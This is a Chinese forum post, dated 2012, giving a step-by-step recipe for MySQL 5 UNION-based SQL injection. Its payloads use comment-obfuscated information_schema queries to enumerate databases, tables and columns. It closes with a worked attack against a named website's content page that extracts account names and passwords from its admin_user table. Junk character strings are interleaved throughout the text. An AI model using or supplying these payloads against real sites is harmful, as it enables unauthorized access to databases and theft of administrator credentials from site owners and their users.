查库7 y6 {6 t. w( S" P. a
6 Q l! g: o5 V1 Bid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
& K k% @6 t% E/ T
% H O& P1 G0 E& Q% I+ n查表
) {1 c' d4 X$ w) P( ?6 w8 n& E9 I. Y
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
& {8 R1 l) c( j: Q. Q7 T! k* u( [4 z' s! V! W
查段. k4 [- D) G' x6 A1 G. M
; \- `! h N3 O! z) ^7 ~9 s
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,18 t6 i( M2 y) B: x/ B% r8 j
" n0 M+ _+ }+ A/ y H- X# ], e2 Z( s2 e' Z7 |
mysql5高级注入方法暴表
& x! c" k) l+ g; B; l2 s* C; j# i( [4 r/ T+ y; M2 X. b
例子如下:) }# r3 j2 h. m& J3 Z
8 y4 I+ C( N- c# V! e
1.爆表1 E8 Y2 f) J2 e) Q0 e) ]
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
% O, X" t- ]& Y: A) d7 J这样爆到第4个时出现了admin_user表。
/ q, a* o G, K" ~ t) h9 @
$ q. Q) V3 @! @9 D3 L9 O- w2.暴字段
, `6 s& H2 {! Z r) hhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*% S' H6 A6 J9 C( u, p) ]% r
7 R+ m, f; z' ~5 t' r2 o
) r$ N; u& n5 l$ Y1 N, r6 {
3.爆密码) S2 ]$ j$ L! c# [, R8 j( s# k3 A7 X
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* , J, o9 d6 F6 [- |
0 H$ U8 m" z5 l) o# u& s
8 Q4 }; w! U+ ~' D) ? I
|
发表于 2012-9-13 16:29:37
收藏
支持
反对